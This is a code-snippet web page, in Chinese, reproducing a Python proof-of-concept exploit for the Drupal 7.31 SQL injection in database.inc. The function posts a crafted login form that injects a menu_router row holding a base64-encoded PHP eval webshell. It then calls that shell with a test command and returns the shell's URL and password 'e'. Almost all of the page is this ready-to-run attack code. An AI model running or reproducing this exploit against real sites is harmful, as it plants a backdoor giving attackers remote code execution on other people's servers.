Drupal 7.31 GetShell via includes_database_database.inc SQL Injection Exploit.py 文件源码-python代码片段

Drupal 7.31 GetShell via includes_database_database.inc SQL Injection Exploit.py 文件源码

python

阅读 33 收藏 0 点赞 0 评论 0

项目：pub1ic_POC 作者: i1ikey0u 项目源码文件源码

def exploit(cls, args):
        url = args['options']['target']
        webshell_url = url + '/?q=<?php%20eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>'
        payload = "name[0;insert into menu_router (path,  page_callback, access_callback, " \
                  "include_file, load_functions, to_arg_functions, description) values ('<" \
                  "?php eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>','php_eval', '1', '" \
                  "modules/php/php.module', '', '', '');#]=test&name[0]=test2&pass=test&fo" \
                  "rm_id=user_login_block"

        if args['options']['verbose']:
            print '[*] Request URL: ' + url
            print '[*] POST Content: ' + payload

        urllib2.urlopen(url, data=payload)
        request = urllib2.Request(webshell_url, data="e=echo strrev(gwesdvjvncqwdijqiwdqwduhq);")
        response = urllib2.urlopen(request).read()

        if 'gwesdvjvncqwdijqiwdqwduhq'[::-1] in response:
            args['success'] = True
            args['poc_ret']['vul_url'] = url
            args['poc_ret']['Webshell'] = webshell_url
            args['poc_ret']['Webshell_PWD'] = 'e'
            return args
        args['success'] = False
        return args